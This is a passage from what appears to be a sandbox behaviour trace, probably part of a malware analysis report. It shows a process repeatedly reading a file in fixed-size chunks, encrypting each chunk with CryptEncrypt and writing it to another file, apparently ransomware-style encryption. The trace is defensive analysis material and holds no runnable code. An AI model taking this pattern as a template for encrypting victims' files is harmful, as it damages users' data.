lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.431] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.431] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.431] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.431] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.432] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.432] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.432] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.432] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.432] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.432] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.432] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.432] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.432] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.432] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.432] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.432] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.432] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.432] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.432] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.433] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.433] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.433] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.433] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.433] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.433] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.433] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.433] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.433] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.433] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.433] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.433] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.433] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.434] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.434] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.434] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.434] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.434] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.434] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.434] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.434] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.434] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.434] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.435] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.435] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.435] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.435] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.435] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.435] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.435] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.435] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.435] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.435] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.435] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.435] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.435] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.435] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.435] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.435] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.435] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.436] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.436] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.436] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.436] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.436] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.436] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.436] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.436] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.436] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.436] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.436] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.436] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.436] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.436] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.436] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.437] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.437] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.437] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.437] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.437] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.437] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.437] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.437] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.437] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.437] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.437] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.437] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.437] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.437] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.437] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.438] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.438] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.438] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.438] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.438] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.438] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.438] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.438] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, 